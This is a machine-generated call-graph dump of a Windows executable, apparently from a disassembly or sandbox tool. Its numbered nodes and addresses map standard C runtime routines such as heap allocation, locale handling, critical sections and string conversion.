12659 10a7a18 GetLastError 12656->12659 12658 10a611c GetLastError 12658->12651 12673 10a80be FlsGetValue 12659->12673 12661 10a7a2d 12662 10a7a7b SetLastError 12661->12662 12663 10a8c83 __calloc_crt 67 API calls 12661->12663 12662->12658 12664 10a7a40 12663->12664 12664->12662 12674 10a80cc FlsSetValue 12664->12674 12666 10a7a54 12667 10a7a5a 12666->12667 12668 10a7a72 12666->12668 12669 10a7a87 __initptd 67 API calls 12667->12669 12670 10a8c4b _free 67 API calls 12668->12670 12671 10a7a62 GetCurrentThreadId 12669->12671 12672 10a7a78 12670->12672 12671->12662 12672->12662 12673->12661 12674->12666 12676 10af1be 12675->12676 12680 10af1d9 12675->12680 12677 10af1ca 12676->12677 12676->12680 12678 10a6117 _wprintf 69 API calls 12677->12678 12681 10af1cf 12678->12681 12679 10af1e9 HeapAlloc 12679->12680 12679->12681 12680->12679 12680->12681 12683 10a8ee3 DecodePointer 12680->12683 12681->12632 12684 10a8ef6 12683->12684 12684->12680 12686 10a8858 EnterCriticalSection 12685->12686 12687 10a8845 12685->12687 12686->12639 12710 10a88dc 12687->12710 12689 10a884b 12689->12686 12690 10a44dd __amsg_exit 69 API calls 12689->12690 12691 10a8857 12690->12691 12691->12686 12907 10a89b8 LeaveCriticalSection 12692->12907 12694 10a7ae3 12694->12642 12696 10ae98b InterlockedIncrement 12695->12696 12697 10ae990 12695->12697 12696->12697 12698 10ae99a InterlockedIncrement 12697->12698 12699 10ae99d 12697->12699 12698->12699 12700 10ae9a8 12699->12700 12701 10ae9a3 InterlockedIncrement 12699->12701 12702 10ae9b2 InterlockedIncrement 12700->12702 12703 10ae9b5 12700->12703 12701->12700 12702->12703 12704 10ae9cc InterlockedIncrement 12703->12704 12705 10ae9df InterlockedIncrement 12703->12705 12706 10ae9f0 InterlockedIncrement 12703->12706 12704->12703 12705->12703 12706->12645 12908 10a89b8 LeaveCriticalSection 12707->12908 12709 10a7b31 12709->12647 12711 10a88e8 _wprintf 12710->12711 12712 10a8909 12711->12712 12713 10a88f1 12711->12713 12727 10a8929 _wprintf 12712->12727 12775 10a8ccd 12712->12775 12733 10a5b39 12713->12733 12720 10a8933 12722 10a8834 __lock 69 API calls 12720->12722 12721 10a8924 12724 10a6117 _wprintf 69 API calls 12721->12724 12725 10a893a 12722->12725 12724->12727 12728 10a8949 InitializeCriticalSectionAndSpinCount 12725->12728 12729 10a895e 12725->12729 12727->12689 12730 10a8964 12728->12730 12731 10a8c4b _free 69 API calls 12729->12731 12781 10a897a 12730->12781 12731->12730 12784 10a4850 12733->12784 12735 10a5b40 12736 10a5b4d 12735->12736 12737 10a4850 __FF_MSGBANNER 70 API calls 12735->12737 12738 10a5b96 __NMSG_WRITE 70 API calls 12736->12738 12740 10a5b6f 12736->12740 12737->12736 12739 10a5b65 12738->12739 12741 10a5b96 __NMSG_WRITE 70 API calls 12739->12741 12742 10a5b96 12740->12742 12741->12740 12743 10a5bb4 __NMSG_WRITE 12742->12743 12744 10a4850 __FF_MSGBANNER 67 API calls 12743->12744 12771 10a5cdb 12743->12771 12747 10a5bc7 12744->12747 12746 10a5d44 12772 10a43c0 12746->12772 12748 10a5ce0 GetStdHandle 12747->12748 12749 10a4850 __FF_MSGBANNER 67 API calls 12747->12749 12752 10a5cee _strlen 12748->12752 12748->12771 12750 10a5bd8 12749->12750 12750->12748 12751 10a5bea 12750->12751 12751->12771 12814 10a419b 12751->12814 12754 10a5d27 WriteFile 12752->12754 12752->12771 12754->12771 12756 10a5d46 12759 10a4060 ___get_qualified_locale 8 API calls 12756->12759 12757 10a5c17 GetModuleFileNameW 12758 10a5c37 12757->12758 12763 10a5c47 ___get_qualified_locale 12757->12763 12760 10a419b __wsetlocale_set_cat 67 API calls 12758->12760 12761 10a5d50 12759->12761 12760->12763 12762 10a5c8d 12762->12756 12832 10a412f 12762->12832 12763->12756 12763->12762 12823 10adacb 12763->12823 12767 10a412f __wsetlocale_get_all 67 API calls 12768 10a5cc4 12767->12768 12768->12756 12769 10a5ccb 12768->12769 12841 10a592a EncodePointer 12769->12841 12867 10a5b2a 12771->12867 12886 10a438e GetModuleHandleExW 12772->12886 12777 10a8cdb 12775->12777 12778 10a891d 12777->12778 12779 10a8cee Sleep 12777->12779 12889 10af00d 12777->12889 12778->12720 12778->12721 12780 10a8d07 12779->12780 12780->12777 12780->12778 12906 10a89b8 LeaveCriticalSection 12781->12906 12783 10a8981 12783->12727 12785 10a485a 12784->12785 12786 10a6117 _wprintf 70 API calls 12785->12786 12787 10a4864 12785->12787 12788 10a4880 12786->12788 12787->12735 12791 10a4035 12788->12791 12794 10a400a DecodePointer 12791->12794 12795 10a401d 12794->12795 12800 10a4060 IsProcessorFeaturePresent 12795->12800 12798 10a400a __invalid_parameter_noinfo_noreturn 8 API calls 12799 10a4041 12798->12799 12799->12735 12801 10a406b 12800->12801 12806 10a3ecd 12801->12806 12805 10a4034 12805->12798 12807 10a3ee7 _memset ___raise_securityfailure 12806->12807 12808 10a3f07 IsDebuggerPresent 12807->12808 12809 10a816d ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 12808->12809 12812 10a3fcb ___raise_securityfailure 12809->12812 12810 10a5b2a __wsetlocale_set_cat 6 API calls 12811 10a3fee 12810->12811 12813 10a8158 GetCurrentProcess TerminateProcess 12811->12813 12812->12810 12813->12805 12815 10a41b4 12814->12815 12816 10a41a6 12814->12816 12817 10a6117 _wprintf 70 API calls 12815->12817 12816->12815 12819 10a41cd 12816->12819 12822 10a41be 12817->12822 12818 10a4035 _wprintf 9 API calls 12820 10a41c8 12818->12820 12819->12820 12821 10a6117 _wprintf 70 API calls 12819->12821 12820->12756 12820->12757 12821->12822 12822->12818 12826 10adad9 12823->12826 12824 10a6117 _wprintf 70 API calls 12827 10adb0d 12824->12827 12825 10adae2 12825->12762 12826->12825 12828 10adadd 12826->12828 12830 10adb1c 12826->12830 12829 10a4035 _wprintf 9 API calls 12827->12829 12828->12824 12828->12825 12829->12825 12830->12825 12831 10a6117 _wprintf 70 API calls 12830->12831 12831->12827 12833 10a413b 12832->12833 12834 10a4149 12832->12834 12833->12834 12839 10a4175 12833->12839 12835 10a6117 _wprintf 70 API calls 12834->12835 12836 10a4153 12835->12836 12837 10a4035 _wprintf 9 API calls 12836->12837 12838 10a415d 12837->12838 12838->12756 12838->12767 12839->12838 12840 10a6117 _wprintf 70 API calls 12839->12840 12840->12836 12874 10a80fe 12841->12874 12844 10a5a1b IsDebuggerPresent 12846 10a5a40 12844->12846 12847 10a5a25 12844->12847 12845 10a596d LoadLibraryExW 12848 10a59a8 GetProcAddress 12845->12848 12849 10a5984 GetLastError 12845->12849 12853 10a5a33 12846->12853 12854 10a5a45 DecodePointer 12846->12854 12852 10a5a2c OutputDebugStringW 12847->12852 12847->12853 12851 10a59bc 7 API calls 12848->12851 12857 10a5a38 12848->12857 12850 10a5993 LoadLibraryW 12849->12850 12849->12857 12850->12848 12850->12857 12855 10a5a18 12851->12855 12856 10a5a04 GetProcAddress EncodePointer 12851->12856 12852->12853 12853->12857 12861 10a5a6c DecodePointer DecodePointer 12853->12861 12865 10a5a84 12853->12865 12854->12857 12855->12844 12856->12855 12858 10a5b2a __wsetlocale_set_cat 6 API calls 12857->12858 12863 10a5b0a 12858->12863 12859 10a5abc DecodePointer 12860 10a5aa8 DecodePointer 12859->12860 12864 10a5ac3 12859->12864 12860->12857 12861->12865 12863->12771 12864->12860 12866 10a5ad4 DecodePointer 12864->12866 12865->12859 12865->12860 12866->12860 12868 10a5b32 12867->12868 12869 10a5b34 IsProcessorFeaturePresent 12867->12869 12868->12746 12871 10ad76d 12869->12871 12878 10ad71c IsDebuggerPresent 12871->12878 12875 10a810d GetModuleHandleW GetProcAddress 12874->12875 12876 10a595e 12874->12876 12877 10a812d 12875->12877 12876->12844 12876->12845 12877->12876 12879 10ad731 ___raise_securityfailure 12878->12879 12884 10a816d SetUnhandledExceptionFilter UnhandledExceptionFilter 12879->12884 12881 10ad739 ___raise_securityfailure 12885 10a8158 GetCurrentProcess TerminateProcess 12881->12885 12883 10ad756 12883->12746 12884->12881 12885->12883 12887 10a43b9 ExitProcess 12886->12887 12888 10a43a7 GetProcAddress 12886->12888 12888->12887 12890 10af088 12889->12890 12895 10af019 12889->12895 12891 10a8ee3 _malloc DecodePointer 12890->12891 12893 10af08e 12891->12893 12892 10af024 12894 10a5b39 __FF_MSGBANNER 69 API calls 12892->12894 12892->12895 12898 10a5b96 __NMSG_WRITE 69 API calls 12892->12898 12902 10a43c0 __mtinitlocknum 3 API calls 12892->12902 12896 10a6117 _wprintf 69 API calls 12893->12896 12894->12892 12895->12892 12897 10af04c RtlAllocateHeap 12895->12897 12900 10af074 12895->12900 12903 10a8ee3 _malloc DecodePointer 12895->12903 12904 10af072 12895->12904 12899 10af080 12896->12899 12897->12895 12897->12899 12898->12892 12899->12777 12901 10a6117 _wprintf 69 API calls 12900->12901 12901->12904 12902->12892 12903->12895 12905 10a6117 _wprintf 69 API calls 12904->12905 12905->12899 12906->12783 12907->12694 12908->12709 12911 10a7cc9 12909->12911 12913 10a7d2d 12911->12913 12919 10aee90 12911->12919 12912 10a7c4c 12912->12529 12912->12531 12913->12912 12914 10aee90 __wincmdln 80 API calls 12913->12914 12914->12913 12916 10a921e 12915->12916 12917 10a9225 12915->12917 13245 10a963d 12916->13245 12917->12524 12922 10aecbf 12919->12922 12925 10a9233 12922->12925 12926 10a9244 12925->12926 12932 10a9291 12925->12932 12933 10a7a00 12926->12933 12929 10a9272 12929->12932 12953 10a9569 12929->12953 12932->12911 12934 10a7a18 __getptd_noexit 70 API calls 12933->12934 12935 10a7a06 12934->12935 12936 10a7a13 12935->12936 12937 10a44dd __amsg_exit 70 API calls 12935->12937 12936->12929 12938 10aebf8 12936->12938 12937->12936 12939 10aec04 _wprintf 12938->12939 12940 10a7a00 _localeconv 70 API calls 12939->12940 12941 10aec09 12940->12941 12942 10aec38 12941->12942 12944 10aec1c 12941->12944 12943 10a8834 __lock 70 API calls 12942->12943 12945 10aec3f 12943->12945 12946 10a7a00 _localeconv 70 API calls 12944->12946 12969 10aec74 12945->12969 12948 10aec21 12946->12948 12950 10aec2f _wprintf 12948->12950 12952 10a44dd __amsg_exit 70 API calls 12948->12952 12950->12929 12952->12950 12954 10a9575 _wprintf 12953->12954 12955 10a7a00 _localeconv 70 API calls 12954->12955 12956 10a957a 12955->12956 12957 10a8834 __lock 70 API calls 12956->12957 12965 10a958d 12956->12965 12958 10a95ab 12957->12958 12959 10a95f4 12958->12959 12960 10a95dc InterlockedIncrement 12958->12960 12961 10a95c2 InterlockedDecrement 12958->12961 13241 10a9605 12959->13241 12960->12959 12961->12960 12964 10a95cd 12961->12964 12963 10a44dd __amsg_exit 70 API calls 12966 10a959b _wprintf 12963->12966 12964->12960 12967 10a8c4b _free 70 API calls 12964->12967 12965->12963 12965->12966 12966->12932 12968 10a95db 12967->12968 12968->12960 12970 10aec7f 12969->12970 12971 10aec53 12969->12971 12970->12971 12972 10ae973 ___addlocaleref 8 API calls 12970->12972 12977 10aec6b 12971->12977 12973 10aec95 12972->12973 12973->12971 12980 10aeb5d 12973->12980 13240 10a89b8 LeaveCriticalSection 12977->13240 12979 10aec72 12979->12948 12981 10aeb6c InterlockedDecrement 12980->12981 12982 10aebf3 12980->12982 12983 10aeb7d InterlockedDecrement 12981->12983 12984 10aeb82 12981->12984 12982->12971 12994 10aea03 12982->12994 12983->12984 12985 10aeb8f 12984->12985 12986 10aeb8c InterlockedDecrement 12984->12986 12987 10aeb9a 12985->12987 12988 10aeb95 InterlockedDecrement 12985->12988 12986->12985 12989 10aeba4 InterlockedDecrement 12987->12989 12990 10aeba7 12987->12990 12988->12987 12989->12990 12991 10aebbe InterlockedDecrement 12990->12991 12992 10aebd1 InterlockedDecrement 12990->12992 12993 10aebe2 InterlockedDecrement 12990->12993 12991->12990 12992->12990 12993->12982 12995 10aea7c 12994->12995 12997 10aea18 12994->12997 12996 10aeac9 12995->12996 12998 10a8c4b _free 70 API calls 12995->12998 13019 10aeaf2 12996->13019 13064 10b4167 12996->13064 12997->12995 13004 10a8c4b _free 70 API calls 12997->13004 13020 10aea49 12997->13020 13000 10aea9d 12998->13000 13002 10a8c4b _free 70 API calls 13000->13002 13006 10aeab0 13002->13006 13003 10a8c4b _free 70 API calls 13003->13019 13009 10aea3e 13004->13009 13005 10aeb51 13010 10a8c4b _free 70 API calls 13005->13010 13012 10a8c4b _free 70 API calls 13006->13012 13007 10a8c4b _free 70 API calls 13008 10aea71 13007->13008 13014 10a8c4b _free 70 API calls 13008->13014 13024 10b3a22 13009->13024 13016 10aeb57 13010->13016 13011 10a8c4b _free 70 API calls 13017 10aea5c 13011->13017 13018 10aeabe 13012->13018 13013 10a8c4b 70 API calls _free 13013->13019 13014->12995 13016->12971 13052 10b3ec0 13017->13052 13022 10a8c4b _free 70 API calls 13018->13022 13019->13005 13019->13013 13020->13011 13023 10aea67 13020->13023 13022->12996 13023->13007 13025 10b3a31 13024->13025 13051 10b3b1a 13024->13051 13026 10b3a42 13025->13026 13027 10a8c4b _free 70 API calls 13025->13027 13028 10b3a54 13026->13028 13029 10a8c4b _free 70 API calls 13026->13029 13027->13026 13030 10b3a66 13028->13030 13031 10a8c4b _free 70 API calls 13028->13031 13029->13028 13032 10a8c4b _free 70 API calls 13030->13032 13034 10b3a78 13030->13034 13031->13030 13032->13034 13033 10b3a8a 13036 10b3a9c 13033->13036 13037 10a8c4b _free 70 API calls 13033->13037 13034->13033 13035 10a8c4b _free 70 API calls 13034->13035 13035->13033 13038 10b3aae 13036->13038 13040 10a8c4b _free 70 API calls 13036->13040 13037->13036 13039 10b3ac0 13038->13039 13041 10a8c4b _free 70 API calls 13038->13041 13042 10b3ad2 13039->13042 13043 10a8c4b _free 70 API calls 13039->13043 13040->13038 13041->13039 13044 10b3ae4 13042->13044 13045 10a8c4b _free 70 API calls 13042->13045 13043->13042 13046 10b3af6 13044->13046 13048 10a8c4b _free 70 API calls 13044->13048 13045->13044 13047 10b3b08 13046->13047 13049 10a8c4b _free 70 API calls 13046->13049 13050 10a8c4b _free 70 API calls 13047->13050 13047->13051 13048->13046 13049->13047 13050->13051 13051->13020 13053 10b3ecb 13052->13053 13054 10b3f23 13052->13054 13055 10b3edb 13053->13055 13056 10a8c4b _free 70 API calls 13053->13056 13054->13023 13057 10b3eed 13055->13057 13058 10a8c4b _free 70 API calls 13055->13058 13056->13055 13059 10b3eff 13057->13059 13060 10a8c4b _free 70 API calls 13057->13060 13058->13057 13061 10b3f11 13059->13061 13062 10a8c4b _free 70 API calls 13059->13062 13060->13059 13061->13054 13063 10a8c4b _free 70 API calls 13061->13063 13062->13061 13063->13054 13065 10b4176 13064->13065 13239 10aeae7 13064->13239 13066 10a8c4b _free 70 API calls 13065->13066 13067 10b417e 13066->13067 13068 10a8c4b _free 70 API calls 13067->13068 13069 10b4186 13068->13069 13070 10a8c4b _free 70 API calls 13069->13070 13071 10b418e 13070->13071 13072 10a8c4b _free 70 API calls 13071->13072 13073 10b4196 13072->13073 13074 10a8c4b _free 70 API calls 13073->13074 13075 10b419e 13074->13075 13076 10a8c4b _free 70 API calls 13075->13076 13077 10b41a6 13076->13077 13078 10a8c4b _free 70 API calls 13077->13078 13079 10b41ad 13078->13079 13080 10a8c4b _free 70 API calls 13079->13080 13081 10b41b5 13080->13081 13082 10a8c4b _free 70 API calls 13081->13082 13083 10b41bd 13082->13083 13084 10a8c4b _free 70 API calls 13083->13084 13085 10b41c5 13084->13085 13086 10a8c4b _free 70 API calls 13085->13086 13087 10b41cd 13086->13087 13088 10a8c4b _free 70 API calls 13087->13088 13089 10b41d5 13088->13089 13090 10a8c4b _free 70 API calls 13089->13090 13091 10b41dd 13090->13091 13092 10a8c4b _free 70 API calls 13091->13092 13093 10b41e5 13092->13093 13094 10a8c4b _free 70 API calls 13093->13094 13095 10b41ed 13094->13095 13096 10a8c4b _free 70 API calls 13095->13096 13097 10b41f5 13096->13097 13098 10a8c4b _free 70 API calls 13097->13098 13099 10b4200 13098->13099 13100 10a8c4b _free 70 API calls 13099->13100 13101 10b4208 13100->13101 13102 10a8c4b _free 70 API calls 13101->13102 13103 10b4210 13102->13103 13104 10a8c4b _free 70 API calls 13103->13104 13105 10b4218 13104->13105 13106 10a8c4b _free 70 API calls 13105->13106 13107 10b4220 13106->13107 13108 10a8c4b _free 70 API calls 13107->13108 13109 10b4228 13108->13109 13110 10a8c4b _free 70 API calls 13109->13110 13111 10b4230 13110->13111 13112 10a8c4b _free 70 API calls 13111->13112 13113 10b4238 13112->13113 13114 10a8c4b _free 70 API calls 13113->13114 13115 10b4240 13114->13115 13116 10a8c4b _free 70 API calls 13115->13116 13117 10b4248 13116->13117 13118 10a8c4b _free 70 API calls 13117->13118 13119 10b4250 13118->13119 13120 10a8c4b _free 70 API calls 13119->13120 13121 10b4258 13120->13121 13122 10a8c4b _free 70 API calls 13121->13122 13123 10b4260 13122->13123 13124 10a8c4b _free 70 API calls 13123->13124 13125 10b4268 13124->13125 13239->13003 13240->12979 13244 10a89b8 LeaveCriticalSection 13241->13244 13243 10a960c 13243->12965 13244->13243 13246 10a9649 _wprintf 13245->13246 13247 10a7a00 _localeconv 70 API calls 13246->13247 13248 10a9651 13247->13248 13249 10a9569 _LocaleUpdate::_LocaleUpdate 72 API calls 13248->13249 13250 10a965b 13249->13250 13276 10a9306 13250->13276 13253 10a8ccd __malloc_crt 70 API calls 13254 10a967d 13253->13254 13255 10a97b0 _wprintf 13254->13255 13283 10a97eb 13254->13283 13255->12917 13258 10a96b3 InterlockedDecrement 13260 10a96db InterlockedIncrement 13258->13260 13261 10a96c6 13258->13261 13259 10a97c0 13259->13255 13263 10a97d3 13259->13263 13266 10a8c4b _free 70 API calls 13259->13266 13260->13255 13262 10a96f2 13260->13262 13261->13260 13265 10a8c4b _free 70 API calls 13261->13265 13262->13255 13268 10a8834 __lock 70 API calls 13262->13268 13264 10a6117 _wprintf 70 API calls 13263->13264 13264->13255 13267 10a96d7 13265->13267 13266->13263 13267->13260 13269 10a9706 InterlockedDecrement 13268->13269 13271 10a9797 InterlockedIncrement 13269->13271 13272 10a9784 13269->13272 13293 10a97b5 13271->13293 13272->13271 13274 10a8c4b _free 70 API calls 13272->13274 13275 10a9796 13274->13275 13275->13271 13277 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 13276->13277 13278 10a9316 13277->13278 13279 10a9337 13278->13279 13280 10a9325 GetOEMCP 13278->13280 13281 10a934e 13279->13281 13282 10a933c GetACP 13279->13282 13280->13281 13281->13253 13281->13255 13282->13281 13284 10a9306 getSystemCP 82 API calls 13283->13284 13285 10a9808 13284->13285 13288 10a985c IsValidCodePage 13285->13288 13290 10a9812 setSBCS 13285->13290 13292 10a9881 _memset __setmbcp_nolock 13285->13292 13286 10a5b2a __wsetlocale_set_cat 6 API calls 13287 10a96a4 13286->13287 13287->13258 13287->13259 13289 10a986e GetCPInfo 13288->13289 13288->13290 13289->13290 13289->13292 13290->13286 13296 10a93db GetCPInfo 13292->13296 13361 10a89b8 LeaveCriticalSection 13293->13361 13295 10a97bc 13295->13255 13297 10a94bd 13296->13297 13298 10a9413 13296->13298 13301 10a5b2a __wsetlocale_set_cat 6 API calls 13297->13301 13306 10af821 13298->13306 13303 10a9567 13301->13303 13303->13290 13305 10af6f1 ___crtLCMapStringA 84 API calls 13305->13297 13307 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 13306->13307 13308 10af832 13307->13308 13316 10af735 13308->13316 13311 10af6f1 13312 10a9233 _LocaleUpdate::_LocaleUpdate 80 API calls 13311->13312 13313 10af702 13312->13313 13333 10af4e8 13313->13333 13317 10af74f 13316->13317 13318 10af75c MultiByteToWideChar 13316->13318 13317->13318 13319 10af788 13318->13319 13328 10af781 13318->13328 13322 10af00d _malloc 70 API calls 13319->13322 13326 10af7a0 _memset __crtLCMapStringA_stat 13319->13326 13320 10a5b2a __wsetlocale_set_cat 6 API calls 13321 10a9474 13320->13321 13321->13311 13322->13326 13323 10af7dc MultiByteToWideChar 13324 10af806 13323->13324 13325 10af7f6 GetStringTypeW 13323->13325 13329 10af3fe 13324->13329 13325->13324 13326->13323 13326->13328 13328->13320 13330 10af419 13329->13330 13331 10af408 13329->13331 13330->13328 13331->13330 13332 10a8c4b _free 70 API calls 13331->13332 13332->13330 13336 10af501 MultiByteToWideChar 13333->13336 13335 10af560 13337 10a5b2a __wsetlocale_set_cat 6 API calls 13335->13337 13336->13335 13339 10af567 13336->13339 13340 10a9495 13337->13340 13338 10af5ba MultiByteToWideChar 13341 10af5d3 13338->13341 13342 10af622 13338->13342 13343 10af00d _malloc 70 API calls 13339->13343 13347 10af584 __crtLCMapStringA_stat 13339->13347 13340->13305 13358 10af4c6 LCMapStringEx 13341->13358 13345 10af3fe __freea 70 API calls 13342->13345 13343->13347 13345->13335 13346 10af5e7 13346->13342 13348 10af5fe 13346->13348 13350 10af62a 13346->13350 13347->13335 13347->13338 13348->13342 13359 10af4c6 LCMapStringEx 13348->13359 13351 10af00d _malloc 70 API calls 13350->13351 13353 10af645 __crtLCMapStringA_stat 13350->13353 13351->13353 13353->13342 13360 10af4c6 LCMapStringEx 13353->13360 13354 10af687 13355 10af6af 13354->13355 13357 10af6a1 WideCharToMultiByte 13354->13357 13356 10af3fe __freea 70 API calls 13355->13356 13356->13342 13357->13355 13358->13346 13359->13342 13360->13354 13361->13295 13363 10aef63 13362->13363 13364 10aef55 13362->13364 13365 10a6117 _wprintf 70 API calls 13363->13365 13364->13363 13367 10aef79 13364->13367 13366 10aef6a 13365->13366 13368 10a4035 _wprintf 9 API calls 13366->13368 13369 10aef74 13367->13369 13370 10a6117 _wprintf 70 API calls 13367->13370 13368->13369 13369->12548 13370->13366 13372 10a8dec EncodePointer 13371->13372 13372->13372 13373 10a8e06 13372->13373 13373->12555 13377 10a8b40 13374->13377 13376 10a8c41 13376->12557 13378 10a8b4c _wprintf 13377->13378 13385 10a468c 13378->13385 13384 10a8b6f _wprintf 13384->13376 13386 10a8834 __lock 70 API calls 13385->13386 13387 10a4693 13386->13387 13388 10a8b80 DecodePointer DecodePointer 13387->13388 13389 10a8b5d 13388->13389 13390 10a8bad 13388->13390 13399 10a8b7a 13389->13399 13390->13389 13402 10aef9f 13390->13402 13392 10a8c10 EncodePointer EncodePointer 13392->13389 13393 10a8be4 13393->13389 13396 10a8d16 __realloc_crt 74 API calls 13393->13396 13397 10a8bfe EncodePointer 13393->13397 13394 10a8bbf 13394->13392 13394->13393 13409 10a8d16 13394->13409 13398 10a8bf8 13396->13398 13397->13392 13398->13389 13398->13397 13435 10a4695 13399->13435 13403 10aefa8 13402->13403 13404 10aefbd HeapSize 13402->13404 13405 10a6117 _wprintf 70 API calls 13403->13405 13404->13394 13406 10aefad 13405->13406 13407 10a4035 _wprintf 9 API calls 13406->13407 13408 10aefb8 13407->13408 13408->13394 13413 10a8d1d 13409->13413 13411 10a8d5c 13411->13393 13412 10a8d3d Sleep 13412->13413 13413->13411 13413->13412 13414 10af09f 13413->13414 13415 10af0a8 13414->13415 13416 10af0b3 13414->13416 13418 10af00d _malloc 70 API calls 13415->13418 13417 10af0bb 13416->13417 13426 10af0c8 13416->13426 13419 10a8c4b _free 70 API calls 13417->13419 13420 10af0b0 13418->13420 13432 10af0c3 __dosmaperr 13419->13432 13420->13413 13421 10af100 13423 10a8ee3 _malloc DecodePointer 13421->13423 13422 10af0d0 HeapReAlloc 13422->13426 13422->13432 13424 10af106 13423->13424 13427 10a6117 _wprintf 70 API calls 13424->13427 13425 10af130 13429 10a6117 _wprintf 70 API calls 13425->13429 13426->13421 13426->13422 13426->13425 13428 10a8ee3 _malloc DecodePointer 13426->13428 13431 10af118 13426->13431 13427->13432 13428->13426 13430 10af135 GetLastError 13429->13430 13430->13432 13433 10a6117 _wprintf 70 API calls 13431->13433 13432->13413 13434 10af11d GetLastError 13433->13434 13434->13432 13438 10a89b8 LeaveCriticalSection 13435->13438 13437 10a469c 13437->13384 13438->13437 13477 10a347e 13439->13477 13441 10a28b9 13442 10a3c76 13441->13442 13445 10a3c82 _wprintf 13442->13445 13443 10a3c90 13444 10a6117 _wprintf 70 API calls 13443->13444 13447 10a3c95 13444->13447 13445->13443 13446 10a3cb6 13445->13446 13995 10a4bf4 13446->13995 13449 10a4035 _wprintf 9 API calls 13447->13449 13454 10a3ca0 _wprintf 13449->13454 13454->12568 13456 10a3b8b _wprintf 13455->13456 13457 10a3b99 13456->13457 13458 10a3bae 13456->13458 13460 10a6117 _wprintf 70 API calls 13457->13460 13459 10a4bf4 __lock_file 71 API calls 13458->13459 13461 10a3bb4 13459->13461 13462 10a3b9e 13460->13462 13463 10a3826 __ftell_nolock 79 API calls 13461->13463 13464 10a4035 _wprintf 9 API calls 13462->13464 13465 10a3bbf 13463->13465 13467 10a3ba9 _wprintf 13464->13467 14132 10a3bdf 13465->14132 13467->12570 14135 10a3795 13468->14135 13470 10a28fc #17 13470->12576 13472 10a1448 13471->13472 13473 10a1474 SetWindowTextW SendMessageW SetFocus 13471->13473 13472->13473 13474 10a1461 13472->13474 13475 10a1464 6 API calls 13472->13475 14324 10a1770 13472->14324 13473->13475 13474->13473 13474->13475 13475->12585 13475->12586 13480 10a348a _wprintf 13477->13480 13478 10a349c 13479 10a6117 _wprintf 70 API calls 13478->13479 13481 10a34a1 13479->13481 13480->13478 13482 10a34c9 13480->13482 13483 10a4035 _wprintf 9 API calls 13481->13483 13496 10a5d51 13482->13496 13493 10a34ac _wprintf @_EH4_CallFilterFunc@8 13483->13493 13485 10a34ce 13486 10a34d7 13485->13486 13487 10a34e4 13485->13487 13490 10a6117 _wprintf 70 API calls 13486->13490 13488 10a350d 13487->13488 13489 10a34ed 13487->13489 13510 10a5e6b 13488->13510 13491 10a6117 _wprintf 70 API calls 13489->13491 13490->13493 13491->13493 13493->13441 13497 10a5d5d _wprintf 13496->13497 13498 10a8834 __lock 70 API calls 13497->13498 13507 10a5d6b 13498->13507 13499 10a5de2 13501 10a8ccd __malloc_crt 70 API calls 13499->13501 13503 10a5de9 13501->13503 13502 10a5e55 _wprintf 13502->13485 13504 10a5df8 InitializeCriticalSectionAndSpinCount EnterCriticalSection 13503->13504 13508 10a5ddb 13503->13508 13504->13508 13505 10a88dc __mtinitlocknum 70 API calls 13505->13507 13507->13499 13507->13505 13507->13508 13533 10a4c33 13507->13533 13538 10a4c9d 13507->13538 13530 10a5e60 13508->13530 13519 10a5e88 13510->13519 13511 10a5e9c 13512 10a6117 _wprintf 70 API calls 13511->13512 13514 10a5ea1 13512->13514 13513 10a6043 13513->13511 13515 10a609f 13513->13515 13516 10a4035 _wprintf 9 API calls 13514->13516 13545 10add7a 13515->13545 13518 10a3518 13516->13518 13527 10a353a 13518->13527 13519->13511 13519->13513 13548 10add98 13519->13548 13524 10adec5 __openfile 87 API calls 13525 10a605b 13524->13525 13525->13513 13526 10adec5 __openfile 87 API calls 13525->13526 13526->13513 13988 10a4c63 13527->13988 13529 10a3540 13529->13493 13543 10a89b8 LeaveCriticalSection 13530->13543 13532 10a5e67 13532->13502 13534 10a4c3e 13533->13534 13535 10a4c54 EnterCriticalSection 13533->13535 13536 10a8834 __lock 70 API calls 13534->13536 13535->13507 13537 10a4c47 13536->13537 13537->13507 13539 10a4cab 13538->13539 13540 10a4cbe LeaveCriticalSection 13538->13540 13544 10a89b8 LeaveCriticalSection 13539->13544 13540->13507 13542 10a4cbb 13542->13507 13543->13532 13544->13542 13554 10adc67 13545->13554 13547 10add93 13547->13518 13944 10addb0 13548->13944 13550 10a6009 13550->13511 13551 10adec5 13550->13551 13952 10adedd 13551->13952 13556 10adc73 _wprintf 13554->13556 13555 10adc85 13557 10a6117 _wprintf 70 API calls 13555->13557 13556->13555 13558 10adcbc 13556->13558 13559 10adc8a 13557->13559 13565 10add2e 13558->13565 13560 10a4035 _wprintf 9 API calls 13559->13560 13564 10adc94 _wprintf 13560->13564 13562 10adcd9 13573 10add02 13562->13573 13564->13547 13577 10a42de 13565->13577 13568 10add48 13568->13562 13570 10add68 13571 10a8c4b _free 70 API calls 13570->13571 13572 10add72 13571->13572 13572->13562 13574 10add08 13573->13574 13575 10add2c 13573->13575 13943 10ae94d LeaveCriticalSection 13574->13943 13575->13564 13578 10a42eb 13577->13578 13579 10a4301 13577->13579 13580 10a6117 _wprintf 70 API calls 13578->13580 13579->13578 13581 10a4308 13579->13581 13582 10a42f0 13580->13582 13583 10a80fe ___crtIsPackagedApp 2 API calls 13581->13583 13584 10a4035 _wprintf 9 API calls 13582->13584 13585 10a430d 13583->13585 13599 10a42fa 13584->13599 13586 10a431e MultiByteToWideChar 13585->13586 13587 10a4311 AreFileApisANSI 13585->13587 13588 10a4338 GetLastError 13586->13588 13589 10a4349 13586->13589 13587->13586 13590 10a431b 13587->13590 13680 10a60f6 13588->13680 13592 10a8ccd __malloc_crt 70 API calls 13589->13592 13590->13586 13593 10a4351 13592->13593 13594 10a4358 MultiByteToWideChar 13593->13594 13593->13599 13595 10a436e GetLastError 13594->13595 13594->13599 13596 10a60f6 __dosmaperr 70 API calls 13595->13596 13597 10a437a 13596->13597 13598 10a8c4b _free 70 API calls 13597->13598 13598->13599 13599->13568 13600 10b30f1 13599->13600 13688 10a732b InitOnceExecuteOnce 13600->13688 13602 10b310f 13603 10b3113 GetLastError 13602->13603 13604 10b3132 13602->13604 13605 10a60f6 __dosmaperr 70 API calls 13603->13605 13689 10b5b5f 13604->13689 13606 10b3125 13605->13606 13608 10a6117 _wprintf 70 API calls 13606->13608 13609 10b312b 13608->13609 13609->13570 13610 10a4060 ___get_qualified_locale 8 API calls 13611 10b3869 